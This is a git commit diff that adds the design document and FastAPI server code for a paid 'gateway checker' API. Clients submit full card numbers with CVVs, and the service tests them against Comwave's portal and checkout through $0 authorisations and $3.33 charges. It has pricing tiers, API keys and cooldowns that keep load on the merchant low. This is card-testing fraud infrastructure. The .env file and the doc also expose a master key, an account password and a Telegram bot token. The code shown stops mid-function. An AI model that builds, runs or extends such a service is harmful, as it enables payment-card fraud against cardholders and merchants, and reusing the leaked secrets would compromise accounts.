commit d12c7f00c696b52c300e6fb74ece1a9f6fddaab6 Author: Deku Date: Wed Mar 25 02:04:52 2026 -0500 api frame diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..c9d9b81 Binary files /dev/null and b/.DS_Store differ diff --git a/.env b/.env new file mode 100644 index 0000000..d9cb9a0 --- /dev/null +++ b/.env @@ -0,0 +1,9 @@ +# API Server +MASTER_KEY=eJQV7hMfRTo-2j1f2c5po4vq4amD-F4nylHRtGPGkMU +API_HOST=0.0.0.0 +API_PORT=8000 + +COMWAVE_USERNAME=tu76502@gmail.com +COMWAVE_PASSWORD=root13579 +BOT_TOKEN=8724978324:AAHG3qJuZwpzacWFVog0jni9RRbz_zr1ThU +ALLOWED_USERS=753208182,1130617884,1787587131 diff --git a/SERVICE_ARCHITECTURE.md b/SERVICE_ARCHITECTURE.md new file mode 100644 index 0000000..f711504 --- /dev/null +++ b/SERVICE_ARCHITECTURE.md @@ -0,0 +1,525 @@ +# Service Architecture — Gateway Checker API + +> Living document. Updated as we discuss and build. Read this before starting any work. + +## Overview + +REST API that wraps gateway checker scripts behind authenticated endpoints. Clients get an API key and hit endpoints — they never see source code. This is a **black-box service** — clients only know the API contract, not how it works internally. + +### How the service works (the big picture) + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ YOUR SERVER │ +│ │ +│ Client A ──►┐ │ +│ Client B ──►┤ FastAPI (api.py) │ +│ Client C ──►┤ │ │ +│ Tg Bot ──►┘ ├── Auth middleware (validate API key) │ +│ ├── Rate limiter (per-key, per-minute) │ +│ ├── Task queue (asyncio.Queue) │ +│ │ │ │ +│ │ ▼ │ +│ ├── Gateway Registry │ +│ │ ├── comwave_forbot.py [max_concurrent=1]│ +│ │ ├── comwave_forbot.py [max_concurrent=5]│ +│ │ └── future_forbot.py [max_concurrent=N]│ +│ │ │ +│ ├── Dedup cache (same card+gateway = cached) │ +│ ├── Request logger (SQLite) │ +│ └── DB (api.db) — keys, usage, logs │ +│ │ +│ Admin (you) ──► /admin/* endpoints (master key) │ +└─────────────────────────────────────────────────────────────────┘ +``` + +### The flow (step by step) + +1. **Client sends request:** `POST /api/check/comwave` with API key + card +2. **Auth middleware:** Validates key exists, is active, not expired, not over limit +3. **Gateway access check:** Is this key allowed to use `comwave`? +4. **Rate limit check:** Has this key exceeded N requests/minute? +5. **Dedup check:** Same card + same gateway in last 60s? Return cached result +6. **Task created:** Card is queued, client gets back `task_id` immediately +7. **Worker picks it up:** Respects gateway's `max_concurrent` semaphore +8. **Gateway runs:** `comwave_forbot.py` does the actual check (5-15s) +9. **Result stored:** In-memory results dict + logged to SQLite +10. **Client polls:** `GET /api/result/{task_id}` → gets result when ready + +--- + +## Stack + +| Component | Choice | Why | +|---|---|---| +| Framework | **FastAPI** | Async native, auto-docs, fast | +| DB | **SQLite** (via `aiosqlite`) | Zero setup, file-based, good for this scale | +| Auth | API key in `X-API-Key` header | Simple, standard | +| Server | **uvicorn** | ASGI server for FastAPI | +| Config | **python-dotenv** | Already installed, clean `.env` loading | +| Keys | `secrets.token_urlsafe(32)` | 43-char random, unguessable | +| Task queue | **asyncio.Queue** | No Redis needed, in-process | +| Concurrency | **asyncio.Semaphore** per gateway | Controls parallel load | + +**Packages to install:** `fastapi`, `uvicorn`, `aiosqlite` + +--- + +## Files + +| File | Purpose | Status | +|---|---|---| +| `api.py` | FastAPI server, gateway registry, auth, task queue, workers | ⬜ Not started | +| `db.py` | SQLite key management + request logging | ⬜ Not started | +| `comwave_forbot.py` | Comwave checker engine (existing, unchanged) | ✅ Done | +| `comwave_bot.py` | Telegram bot (existing, will update to call API later) | ✅ Done | +| `api.db` | SQLite database (auto-created at runtime) | Auto | +| `.env` | `MASTER_KEY`, `BOT_TOKEN`, `API_HOST`, `API_PORT`, credentials | ✅ Exists (needs `MASTER_KEY`) | +| `SERVICE_ARCHITECTURE.md` | This file | ✅ | + +--- + +## API Endpoints + +### Public (no auth) + +| Method | Endpoint | Description | +|---|---|---| +| `GET` | `/health` | Health check — `{"status": "ok", "uptime": 3600}` | + +### Client Endpoints (require API key) + +| Method | Endpoint | Body | Description | +|---|---|---|---| +| `POST` | `/api/check/{gateway}` | `{"card": "cc\|mm\|yyyy\|cvv"}` | Submit card for checking, returns `task_id` | +| `GET` | `/api/result/{task_id}` | — | Poll for result (queued/processing/completed) | +| `GET` | `/api/usage` | — | Check own usage/limits/expiry | +| `GET` | `/api/gateways` | — | List available gateways + status | +| `GET` | `/api/cooldown` | — | Check own cooldown timers per gateway | + +### Admin Endpoints (require master key) + +| Method | Endpoint | Body | Description | +|---|---|---|---| +| `POST` | `/admin/keys` | `{"owner", "gateways", "request_limit", "expires_days", "rate_per_minute"}` | Create new API key | +| `GET` | `/admin/keys` | — | List all keys with usage | +| `GET` | `/admin/keys/{key}` | — | Get single key details | +| `PATCH` | `/admin/keys/{key}` | fields to update | Update key limits/expiry/gateways | +| `DELETE` | `/admin/keys/{key}` | — | Revoke a key | +| `GET` | `/admin/stats` | — | Live server stats (queues, 24h counts, gateway health) | + +--- + +## Gateway Registry + +Each gateway declares its function, concurrency limit, timeout, and optional lifecycle hooks: + +```python +GATEWAYS = { + "comwave": { + "fn": checker.check_card, # the async check function + "type": "$0 auth", # display label + "status": "online", # online/maintenance/offline + "max_concurrent": 1, # uses shared session, serialize + "timeout": 30, # seconds before giving up + "cooldown": 20, # per-user cooldown in seconds + "max_queue": 50, # max tasks waiting in queue + "init": checker.ensure_logged_in, # called on API startup + "shutdown": checker.shutdown, # called on API shutdown + }, + "comwave3": { + "fn": check_card_3, + "type": "$3.33 charge", + "status": "online", + "max_concurrent": 5, # stateless, can run in parallel + "timeout": 60, + "cooldown": 20, # per-user cooldown in seconds + "max_queue": 50, # max tasks waiting in queue + "init": None, + "shutdown": None, + }, + # Adding a new gateway: + # "duke": { + # "fn": duke_check, + # "type": "$1.00 charge", + # "status": "online", + # "max_concurrent": 3, + # "timeout": 45, + # "cooldown": 20, + # "max_queue": 50, + # "init": None, + # "shutdown": None, + # }, +} +``` + +**Adding a new gateway:** +1. Code `new_site_forbot.py` with `async def check_card(card: str) -> dict` function +2. Import and register in `GATEWAYS` dict in `api.py` +3. Create/update client keys to include the new gateway name +4. Done — client uses `POST /api/check/newsite` + +**Gateway function contract:** +```python +async def check_card(card: str) -> dict: + # card = "cc|mm|yyyy|cvv" + # Must return: {"status": "approved"|"declined"|"error", "message": "...", "time": float} +``` + +**Cooldown:** +- Each gateway has a `cooldown` value (seconds) — **per-user**, not global +- After a user submits a card to a gateway, they must wait `cooldown` seconds before submitting another to the **same** gateway +- Different users are independent — User A's cooldown doesn't block User B +- Different gateways are independent — cooldown on `comwave` doesn't affect `comwave3` +- Tracked via in-memory dict: `last_request[api_key][gateway] → timestamp` +- If a user submits too soon: `429 {"detail": "Cooldown active", "retry_after": 12.5}` (remaining seconds) +- Trade-off accepted: site load scales with number of active users (10 users = up to 10 concurrent requests), but users never wait for each other + +**Concurrency control:** +- Each gateway gets its own `asyncio.Semaphore(max_concurrent)` +- `comwave` max_concurrent=1 → only 1 check at a time (shared session with lock) +- `comwave3` max_concurrent=5 → up to 5 parallel checks (stateless) +- Excess requests wait in queue, not rejected + +**Lifecycle hooks:** +- `init()` — called once when API server starts (e.g. comwave login) +- `shutdown()` — called once when API server stops (e.g. comwave logout) +- Both are optional (`None` for stateless gateways) + +--- + +## Task Queue System + +Instead of making clients wait 5-15s for a response, we use async tasks: + +### Submit flow +``` +POST /api/check/comwave {"card": "4111...|12|2025|123"} + ↓ +Returns immediately: +{"task_id": "abc123", "status": "queued", "gateway": "comwave", "position": 2, "estimated_wait": 15} +``` + +### Poll flow +``` +GET /api/result/abc123 + ↓ +While queued: {"task_id": "abc123", "status": "queued", "position": 2, "expires_in": 290} +While processing: {"task_id": "abc123", "status": "processing", "expires_in": 270} +When done: {"task_id": "abc123", "status": "completed", "result": {...}, "remaining": 999} +``` + +### Implementation +- `asyncio.Queue` per gateway — tasks are queued and processed by workers +- Workers respect `max_concurrent` semaphore +- Results stored in `dict[task_id] → result` (in-memory, TTL 5 minutes) +- `task_id` = `uuid4()` short string + +### Why this is better than synchronous +- No HTTP timeout issues (client gets response in <100ms) +- Client can submit multiple cards and poll all results +- Server controls processing speed via semaphores +- Batch support becomes trivial (submit N tasks, poll N results) + +### Task ownership +- Each task is tied to the API key that created it +- Only the creating key can poll `GET /api/result/{task_id}` +- Other keys get `404 "Task not found"` — prevents cross-client result snooping +- Stored as `tasks[task_id] = {"api_key": key, "result": ..., ...}` + +### Max queue depth +- Each gateway has a max queue size (default: 50 tasks) +- If queue is full: `503 {"detail": "Gateway overloaded", "queue_depth": 50}` +- Prevents a single client from flooding the queue during cooldown edge cases +- Configurable per gateway via `max_queue` field in registry + +--- + +## Throttling Strategy + +**Model: Per-user cooldown (20s default)** + +Each user (API key) has an independent cooldown timer per gateway. After submitting a card, that user must wait `cooldown` seconds before submitting another card to the same gateway. + +### How it works +``` +User A submits card → comwave processes → User A must wait 20s +User B submits card → comwave processes → User B must wait 20s (independent of A) +User A submits to comwave3 → allowed immediately (different gateway) +``` + +### Implementation +```python +# In-memory tracker +last_request: dict[str, dict[str, float]] = {} # {api_key: {gateway: timestamp}} + +# Before queuing a task: +now = time.time() +last = last_request.get(api_key, {}).get(gateway, 0) +remaining = cooldown - (now - last) +if remaining > 0: + raise HTTPException(429, {"detail": "Cooldown active", "retry_after": round(remaining, 1)}) +last_request.setdefault(api_key, {})[gateway] = now +``` + +### Behavior with multiple users +| Time | User A | User B | User C | Site load | +|------|--------|--------|--------|-----------| +| 0s | submits card | submits card | — | 2 concurrent | +| 5s | waiting (15s left) | waiting (15s left) | submits card | 1 concurrent | +| 20s | submits next | submits next | waiting (5s left) | 2 concurrent | +| 25s | waiting | waiting | submits next | 1 concurrent | + +**Max site load = number of active users** (each can send 1 request per 20s) + +--- + +## Request Deduplication + +If a client sends the **same card** to the **same gateway** within **60 seconds**, return the cached result instead of hitting the gateway again. + +- **Key:** `hash(card + gateway)` (SHA256, not stored in plain text) +- **Cache:** In-memory dict with TTL +- **Why:** Prevents accidental double-charges on `comwave3`, saves gateway resources + +--- + +## Database Schema (SQLite) + +### `api_keys` table + +| Column | Type | Description | +|---|---|---| +| `api_key` | TEXT PK | The key string (`sk_live_...`) | +| `owner` | TEXT | Client name/identifier | +| `created_at` | DATETIME | When key was created | +| `expires_at` | DATETIME NULL | NULL = never expires | +| `request_limit` | INTEGER NULL | NULL = unlimited | +| `requests_used` | INTEGER | Counter, starts at 0 | +| `rate_per_minute` | INTEGER | Max requests per minute (default 10) | +| `allowed_gateways` | TEXT | JSON list `["comwave","comwave3"]` or `"*"` for all | +| `is_active` | BOOLEAN | Can be deactivated without deleting | +| `is_paused` | BOOLEAN | Temporarily disabled (client sees "API key paused") | + +### `request_log` table + +| Column | Type | Description | +|---|---|---| +| `id` | INTEGER PK | Auto-increment | +| `api_key` | TEXT | Which key was used | +| `gateway` | TEXT | Which gateway | +| `card` | TEXT | Full card (`cc|mm|yyyy|cvv`) | +| `status` | TEXT | approved/declined/error | +| `response_time` | REAL | Seconds | +| `created_at` | DATETIME | Timestamp | +| `ip_address` | TEXT | Client IP | + +### `admin_log` table + +| Column | Type | Description | +|---|---|---| +| `id` | INTEGER PK | Auto-increment | +| `action` | TEXT | create_key / revoke_key / update_key / pause_key / unpause_key | +| `target_key` | TEXT | Which API key was affected | +| `details` | TEXT | JSON of what changed (e.g. `{"request_limit": [1000, 2000]}`) | +| `ip_address` | TEXT | Admin's IP | +| `created_at` | DATETIME | Timestamp | + +--- + +## Security + +| Layer | Implementation | +|---|---| +| **Auth** | `X-API-Key` header required on all client/admin endpoints | +| **Key format** | `sk_live_` + `secrets.token_urlsafe(32)` | +| **No docs in prod** | `FastAPI(docs_url=None, redoc_url=None)` | +| **HTTPS** | Behind nginx with SSL or Cloudflare tunnel | +| **Rate limit** | Per-minute limit per API key (in-memory sliding window) | +| **IP block** | Block IP after 10 failed auth attempts (in-memory, resets after 15min) | +| **Full card logging** | Full card stored in request_log (keep `api.db` protected) | +| **Dedup hashing** | Card+gateway hashed with SHA256, never stored raw | +| **Master key** | From `.env`, used for `/admin/*` only | +| **Health endpoint** | `/health` is the only unauthenticated endpoint, reveals nothing sensitive | +| **Graceful shutdown** | Finish in-progress checks before exit, call gateway shutdown hooks | + +--- + +## Response Format + +### Submit check +```json +{ + "task_id": "a1b2c3d4", + "status": "queued", + "gateway": "comwave", + "position": 2, + "estimated_wait": 15 +} +``` + +### Poll result (queued) +```json +{ + "task_id": "a1b2c3d4", + "status": "queued", + "position": 2, + "expires_in": 290 +} +``` + +### Poll result (processing) +```json +{ + "task_id": "a1b2c3d4", + "status": "processing", + "expires_in": 270 +} +``` + +### Poll result (completed) +```json +{ + "task_id": "a1b2c3d4", + "status": "completed", + "result": { + "status": "declined", + "gateway": "comwave", + "message": "DECLINED [VISA] | Last4: 1111 | Auth: 000000 | Ref: 662321650018600120", + "time": 5.28 + }, + "remaining": 999 +} +``` + +### Usage +```json +{ + "owner": "client_john", + "requests_used": 347, + "requests_limit": 1000, + "expires_at": "2026-04-24T00:00:00", + "gateways": ["comwave", "comwave3"], + "rate_per_minute": 10 +} +``` + +### Gateways +```json +{ + "gateways": { + "comwave": {"status": "online", "type": "$0 auth"}, + "comwave3": {"status": "online", "type": "$3.33 charge"} + } +} +``` + +### Errors +```json +{"detail": "Missing API key"} // 401 +{"detail": "Invalid API key"} // 401 +{"detail": "API key expired"} // 401 +{"detail": "API key deactivated"} // 401 +{"detail": "Request limit exceeded", "used": 1000, "limit": 1000} // 429 +{"detail": "Rate limit exceeded", "retry_after": 6} // 429 +{"detail": "Cooldown active", "retry_after": 12.5} // 429 +{"detail": "Access denied for gateway: duke"} // 403 +{"detail": "Gateway not found: xyz"} // 404 +{"detail": "Gateway offline: duke"} // 503 +{"detail": "Gateway overloaded", "queue_depth": 50} // 503 +{"detail": "API key paused"} // 401 +{"detail": "Invalid card format"} // 400 +{"detail": "Task not found"} // 404 +{"detail": "IP blocked"} // 403 +``` + +--- + +## Key Tiers (pricing model) + +| Tier | Limit | Expiry | Gateways | Rate | +|---|---|---|---|---| +| Trial | 50 requests | 7 days | 1 gateway | 5/min | +| Standard | 1000/month | 30 days | specific | 10/min | +| Unlimited | no limit | no expiry | all | 50/min | + +--- + +## Telegram Bot Integration (future) + +**Option A (recommended):** Bot calls own API with its own key — cleanest separation, bot is just another API consumer. The bot gets an "unlimited" key with all gateways. + +**Option B:** Bot imports checkers directly (current setup) — faster, no network hop but tightly coupled. + +Decision: TBD — build API first, connect bot later. + +--- + +## .env Structure + +```env +# API Server +MASTER_KEY=your_admin_secret_here +API_HOST=0.0.0.0 +API_PORT=8000 + +# Telegram Bot +BOT_TOKEN=your_bot_token +ALLOWED_USERS=123456,789012 + +# Gateway Credentials +COMWAVE_USERNAME=tu76502@gmail.com +COMWAVE_PASSWORD=root13579 +``` + +--- + +## Build Order + +### Phase 1: Core API (v1) +1. ⬜ Install `fastapi`, `uvicorn`, `aiosqlite` +2. ⬜ Build `db.py` — SQLite init, key CRUD, usage tracking, request logging +3. ⬜ Build `api.py` — FastAPI app, auth middleware, gateway registry, task queue + workers, all endpoints +4. ⬜ Test with comwave gateway — submit, poll, verify result +5. ⬜ Test admin endpoints — create key, list, revoke +6. ⬜ Test security — expired key, over-limit, wrong gateway, IP blocking +7. ⬜ Test concurrency — multiple clients hitting same gateway + +### Phase 2: Bot + Polish +8. ⬜ Connect Telegram bot via API (Option A) +9. ⬜ Add more gateways as clients request them + +### Phase 3: Future (v2) +10. ⬜ Webhook/callback support for async results +11. ⬜ Batch endpoint (`POST /api/check/batch/{gateway}`) +12. ⬜ IP whitelisting per API key +13. ⬜ Key rotation +14. ⬜ Read-only key scoping (usage-only vs full-access) +15. ⬜ Client dashboard (simple HTML) +16. ⬜ Gateway health monitoring (auto-disable on failure) +17. ⬜ Cloudflare Tunnel for easy HTTPS + +--- + +## Existing Gateways Reference + +### Comwave $0 auth (`comwave`) +- **File:** `comwave_forbot.py` → `ComwaveChecker.check_card()` +- **Type:** Account portal card update, Moneris Checkout v1 +- **Amount:** $0 (auth only) +- **Session:** Single persistent login, `asyncio.Lock` for ticket serialization +- **Concurrency:** max_concurrent=1 (shared session) +- **Lifecycle:** init = `ensure_logged_in()`, shutdown = `shutdown()` +- **Note:** Server enforces one login at a time + +### Comwave $3.33 charge (`comwave3`) +- **File:** `comwave_forbot.py` → `check_card_3()` +- **Type:** WooCommerce guest checkout, Moneris Checkout v1 +- **Amount:** $3.33 CAD ($2.95 + 12% tax) +- **Session:** Stateless, each call gets own session +- **Concurrency:** max_concurrent=5 (fully parallel-safe) +- **Lifecycle:** no init/shutdown needed + +--- + +*Last updated: 2026-03-24* diff --git a/api.db b/api.db new file mode 100644 index 0000000..7bf7fc8 Binary files /dev/null and b/api.db differ diff --git a/api.py b/api.py new file mode 100644 index 0000000..e71890e --- /dev/null +++ b/api.py @@ -0,0 +1,620 @@ +""" +Gateway Checker API — FastAPI server. +Run: uvicorn api:app --host 0.0.0.0 --port 8000 +""" + +import asyncio +import hashlib +import logging +import os +import re +import time +import uuid +from contextlib import asynccontextmanager +from datetime import datetime, timezone + +from dotenv import load_dotenv +from fastapi import FastAPI, HTTPException, Request +from fastapi.responses import JSONResponse +from pydantic import BaseModel + +import db +from comwave_auth import checker +from comwave_charge import check_card_3 + +load_dotenv() +logging.basicConfig(level=logging.INFO, format="%(asctime)s | %(levelname)s | %(message)s") +log = logging.getLogger("api") + +MASTER_KEY = os.getenv("MASTER_KEY", "") +if not MASTER_KEY: + log.warning("MASTER_KEY not set in .env — admin endpoints will reject all requests") + +# ── Gateway Registry ── + +GATEWAYS = { + "comwave": { + "fn": checker.check_card, + "type": "$0 auth", + "status": "online", + "max_concurrent": 1, + "timeout": 30, + "cooldown": 20, + "max_queue": 50, + "init": checker.ensure_login, + "shutdown": checker.shutdown, + }, + "comwave3": { + "fn": check_card_3, + "type": "$3.33 charge", + "status": "online", + "max_concurrent": 5, + "timeout": 60, + "cooldown": 20, + "max_queue": 50, + "init": None, + "shutdown": None, + }, +} + +# ── In-Memory State ── + +tasks: dict[str, dict] = {} # task_id → {api_key, status, result, gateway, created, expires} +queues: dict[str, asyncio.Queue] = {} # gateway → Queue +semaphores: dict[str, asyncio.Semaphore] = {} # gateway → Semaphore +workers: list[asyncio.Task] = [] + +last_request: dict[str, dict[str, float]] = {} # api_key → {gateway → timestamp} (cooldown) +rate_windows: dict[str, list[float]] = {} # api_key → [timestamps] (rate limit) +failed_ips: dict[str, dict] = {} # ip → {count, blocked_until} +dedup_cache: dict[str, dict] = {} # sha256(card+gw) → {result, expires} + +gateway_errors: dict[str, int] = {} # gateway → consecutive error count +avg_times: dict[str, float] = {} # gateway → avg response time + +START_TIME = 0.0 + +# ── Request Models ── + +class CheckRequest(BaseModel): + card: str + +class CreateKeyRequest(BaseModel): + owner: str + gateways: list[str] | str = "*" + request_limit: int | None = None + expires_days: int | None = None + rate_per_minute: int = 10 + +class UpdateKeyRequest(BaseModel): + owner: str | None = None + gateways: list[str] | str | None = None + request_limit: int | None = None + rate_per_minute: int | None = None + is_active: bool | None = None + is_paused: bool | None = None + expires_days: int | None = None + + +# ── Helpers ── + +CARD_RE = re.compile(r"^\d{13,19}\|\d{1,2}\|\d{2,4}\|\d{3,4}$") + +def validate_card(card: str) -> bool: + return bool(CARD_RE.match(card.strip())) + + +def get_client_ip(request: Request) -> str: + forwarded = request.headers.get("x-forwarded-for") + if forwarded: + return forwarded.split(",")[0].strip() + return request.client.host if request.client else "unknown" + + +def check_ip_block(ip: str): + info = failed_ips.get(ip) + if not info: + return + if info.get("blocked_until") and time.time() < info["blocked_until"]: + raise HTTPException(403, {"detail": "IP blocked"}) + if info.get("blocked_until") and time.time() >= info["blocked_until"]: + del failed_ips[ip] + + +def record_failed_auth(ip: str): + info = failed_ips.setdefault(ip, {"count": 0, "blocked_until": None}) + info["count"] += 1 + if info["count"] >= 10: + info["blocked_until"] = time.time() + 900 # 15 min + log.warning(f"IP blocked: {ip} (10 failed auth attempts)") + + +async def get_api_key(request: Request) -> dict: + ip = get_client_ip(request) + check_ip_block(ip) + key = request.headers.get("x-api-key", "") + if not key: + record_failed_auth(ip) + raise HTTPException(401, {"detail": "Missing API key"}) + record = await db.get_key(key) + if not record: + record_failed_auth(ip) + raise HTTPException(401, {"detail": "Invalid API key"}) + if not record["is_active"]: + raise HTTPException(401, {"detail": "API key deactivated"}) + if record["is_paused"]: + raise HTTPException(401, {"detail": "API key paused"}) + if record["expires_at"]: + exp = datetime.fromisoformat(record["expires_at"]) + if datetime.now(timezone.utc) > exp: + raise HTTPException(401, {"detail": "API key expired"}) + if record["request_limit"] is not None and record["requests_used"] >= record["request_limit"]: + raise HTTPException(429, {"detail": "Request limit exceeded", + "used": record["requests_used"], "limit": record["request_limit"]}) + return record + + +def check_rate_limit(api_key: str, rate_per_minute: int): + now = time.time() + window = rate_windows.setdefault(api_key, []) + cutoff = now - 60 + rate_windows[api_key] = [t for t in window if t > cutoff] + if len(rate_windows[api_key]) >= rate_per_minute: + oldest = min(rate_windows[api_key]) + retry_after = 60 - (now - oldest) + raise HTTPException(429, {"detail": "Rate limit exceeded", "retry_after": round(retry_after, 1)}) + rate_windows[api_key].append(now) + + +def check_cooldown(api_key: str, gateway: str, cooldown: float): + now = time.time() + last = last_request.get(api_key, {}).get(gateway, 0) + remaining = cooldown - (now - last) + if remaining > 0: + raise HTTPException(429, {"detail": "Cooldown active", "retry_after": round(remaining, 1)}) + last_request.setdefault(api_key, {})[gateway] = now + + +def check_dedup(card: str, gateway: str) -> dict | None: + h = hashlib.sha256(f"{card}:{gateway}".encode()).hexdigest() + cached = dedup_cache.get(h) + if cached and time.time() < cached["expires"]: + return cached["result"] + if cached: + del dedup_cache[h] + return None + + +def store_dedup(card: str, gateway: str, result: dict): + h = hashlib.sha256(f"{card}:{gateway}".encode()).hexdigest() + dedup_cache[h] = {"result": result, "expires": time.time() + 60} + + +def parse_gateway_result(raw: str, gateway: str, elapsed: float) -> dict: + """Convert gateway string result to API dict format.""" + raw_lower = raw.lower() + if raw_lower.startswith("approved") or raw_lower.startswith("charged"): + status = "approved" + elif raw_lower.startswith("declined"): + status = "declined" + elif raw_lower.startswith("rate limited"): + status = "error" + else: + status = "error" + return {"status": status, "gateway": gateway, "message": raw, "time": round(elapsed, 2)} + + +def get_queue_position(task_id: str, gateway: str) -> int: + """Estimate position by counting queued tasks for this gateway created before this task.""" + task = tasks.get(task_id) + if not task: + return 0 + pos = 0 + for tid, t in tasks.items(): + if t.get("gateway") == gateway and t.get("status") == "queued" and t.get("created", 0) <= task.get("created", 0): + pos += 1 + return pos + + +# ── Workers ── + +async def gateway_worker(gateway_name: str): + queue = queues[gateway_name] + sem = semaphores[gateway_name] + gw = GATEWAYS[gateway_name] + + while True: + task_id, card, api_key, ip = await queue.get() + tasks[task_id]["status"] = "processing" + + async with sem: + start = time.time() + try: + raw = await asyncio.wait_for(gw["fn"](card), timeout=gw["timeout"]) + elapsed = time.time() - start + result = parse_gateway_result(raw, gateway_name, elapsed) + + # update avg time + prev = avg_times.get(gateway_name, elapsed) + avg_times[gateway_name] = (prev + elapsed) / 2 + + # reset error counter on success + if result["status"] != "error": + gateway_errors[gateway_name] = 0 + else: + gateway_errors[gateway_name] = gateway_errors.get(gateway_name, 0) + 1 + + except asyncio.TimeoutError: + elapsed = time.time() - start + result = {"status": "error", "gateway": gateway_name, "message": "Timeout", "time": round(elapsed, 2)} + gateway_errors[gateway_name] = gateway_errors.get(gateway_name, 0) + 1 + + except Exception as e: + elapsed = time.time() - start + result = {"status": "error", "gateway": gateway_name, "message": f"Error: {e}", "time": round(elapsed, 2)} + gateway_errors[gateway_name] = gateway_errors.get(gateway_name, 0) + 1 + log.exception(f"Gateway {gateway_name} error for task {task_id}") + + # auto-disable on 5 consecutive errors + if gateway_errors.get(gateway_name, 0) >= 5: + GATEWAYS[gateway_name]["status"] = "maintenance" + log.warning(f"Gateway {gateway_name} auto-disabled after 5 consecutive errors") + + # store result + tasks[task_id]["status"] = "completed" + tasks[task_id]["result"] = result + tasks[task_id]["expires"] = time.time() + 300 # 5 min TTL + + # store dedup + store_dedup(card, gateway_name, result) + + # log to DB + try: + await db.log_request(api_key, gateway_name, card, result["status"], elapsed, ip) + await db.increment_usage(api_key) + except Exception: + log.exception("Failed to log request to DB") + + queue.task_done() + + +async def cleanup_loop(): + """Evict expired tasks, dedup cache entries, and rate windows every 60s.""" + while True: + await asyncio.sleep(60) + now = time.time() + + # expired tasks + expired = [tid for tid, t in tasks.items() if t.get("expires") and now > t["expires"]] + for tid in expired: + del tasks[tid] + + # expired dedup + expired_dedup = [h for h, v in dedup_cache.items() if now > v["expires"]] + for h in expired_dedup: + del dedup_cache[h] + + # expired IP blocks + expired_ips = [ip for ip, v in failed_ips.items() + if v.get("blocked_until") and now > v["blocked_until"]] + for ip in expired_ips: + del failed_ips[ip] + + +# ── Lifecycle ── + +@asynccontextmanager +async def lifespan(app: FastAPI): + global START_TIME + START_TIME = time.time() + + # init DB + await db.init_db() + log.info("Database initialized") + + # init queues + semaphores + workers + for name, gw in GATEWAYS.items(): + queues[name] = asyncio.Queue(maxsize=gw["max_queue"]) + semaphores[name] = asyncio.Semaphore(gw["max_concurrent"]) + worker = asyncio.create_task(gateway_worker(name), name=f"worker-{name}") + workers.append(worker) + gateway_errors[name] = 0 + log.info(f"Gateway '{name}' ready (max_concurrent={gw['max_concurrent']}, cooldown={gw['cooldown']}s)") + + # init gateway hooks + for name, gw in GATEWAYS.items(): + if gw["init"]: + try: + await gw["init"]() + log.info(f"Gateway '{name}' init hook completed") + except Exception: + log.exception(f"Gateway '{name}' init hook failed") + + # start cleanup loop + cleanup = asyncio.create_task(cleanup_loop(), name="cleanup") + workers.append(cleanup) + + log.info(f"API server started with {len(GATEWAYS)} gateways") + yield + + # shutdown + log.info("Shutting down...") + for w in workers: + w.cancel() + + for name, gw in GATEWAYS.items(): + if gw["shutdown"]: + try: + await gw["shutdown"]() + log.info(f"Gateway '{name}' shutdown hook completed") + except Exception: + log.exception(f"Gateway '{name}' shutdown hook failed") + + log.info("Shutdown complete") + + +app = FastAPI(docs_url=None, redoc_url=None, lifespan=lifespan) + + +@app.exception_handler(HTTPException) +async def custom_http_exception(request: Request, exc: HTTPException): + """Return detail directly — avoids FastAPI double-wrapping dicts.""" + content = exc.detail if isinstance(exc.detail, dict) else {"detail": exc.detail} + return JSONResponse(status_code=exc.status_code, content=content) + + +# ── Public ── + +@app.get("/health") +async def health(): + return {"status": "ok", "uptime": round(time.time() - START_TIME)} + + +# ── Client Endpoints ── + +@app.post("/api/check/{gateway}") +async def submit_check(gateway: str, body: CheckRequest, request: Request): + key_record = await get_api_key(request) + api_key = key_record["api_key"] + + # gateway exists? + if gateway not in GATEWAYS: + raise HTTPException(404, {"detail": f"Gateway not found: {gateway}"}) + + gw = GATEWAYS[gateway] + + # gateway online? + if gw["status"] != "online": + raise HTTPException(503, {"detail": f"Gateway offline: {gateway}"}) + + # gateway access? + allowed = key_record["allowed_gateways"] + if allowed != "*" and gateway not in allowed: + raise HTTPException(403, {"detail": f"Access denied for gateway: {gateway}"}) + + # validate card + card = body.card.strip() + if not validate_card(card): + raise HTTPException(400, {"detail": "Invalid card format"}) + + # rate limit + check_rate_limit(api_key, key_record["rate_per_minute"]) + + # cooldown + check_cooldown(api_key, gateway, gw["cooldown"]) + + # dedup + cached = check_dedup(card, gateway) + if cached: + task_id = str(uuid.uuid4())[:8] + tasks[task_id] = { + "api_key": api_key, "status": "completed", "result": cached, + "gateway": gateway, "created": time.time(), "expires": time.time() + 300 + } + remaining = None + if key_record["request_limit"]: + remaining = key_record["request_limit"] - key_record["requests_used"] + return {"task_id": task_id, "status": "completed", "result": cached, + "remaining": remaining, "cached": True} + + # queue full? + if queues[gateway].full(): + raise HTTPException(503, {"detail": "Gateway overloaded", "queue_depth": gw["max_queue"]}) + + # create task + task_id = str(uuid.uuid4())[:8] + ip = get_client_ip(request) + tasks[task_id] = { + "api_key": api_key, "status": "queued", "result": None, + "gateway": gateway, "created": time.time(), "expires": time.time() + 300 + } + await queues[gateway].put((task_id, card, api_key, ip)) + + position = queues[gateway].qsize() + est_wait = round(position * avg_times.get(gateway, 10), 1) + + return {"task_id": task_id, "status": "queued", "gateway": gateway, + "position": position, "estimated_wait": est_wait} + + +@app.get("/api/result/{task_id}") +async def poll_result(task_id: str, request: Request): + key_record = await get_api_key(request) + + task = tasks.get(task_id) + if not task or task["api_key"] != key_record["api_key"]: + raise HTTPException(404, {"detail": "Task not found"}) + + now = time.time() + expires_in = round(task["expires"] - now) if task.get("expires") else None + + if task["status"] == "queued": + position = get_queue_position(task_id, task["gateway"]) + return {"task_id": task_id, "status": "queued", "position": position, "expires_in": expires_in} + + if task["status"] == "processing": + return {"task_id": task_id, "status": "processing", "expires_in": expires_in} + + # completed + remaining = None + rec = await db.get_key(key_record["api_key"]) + if rec and rec["request_limit"]: + remaining = rec["request_limit"] - rec["requests_used"] + + return {"task_id": task_id, "status": "completed", "result": task["result"], + "remaining": remaining} + + +@app.get("/api/usage") +async def get_usage(request: Request): + key_record = await get_api_key(request) + return { + "owner": key_record["owner"], + "requests_used": key_record["requests_used"], + "requests_limit": key_record["request_limit"], + "expires_at": key_record["expires_at"], + "gateways": key_record["allowed_gateways"], + "rate_per_minute": key_record["rate_per_minute"], + } + + +@app.get("/api/gateways") +async def list_gateways(request: Request): + key_record = await get_api_key(request) + allowed = key_record["allowed_gateways"] + result = {} + for name, gw in GATEWAYS.items(): + if allowed == 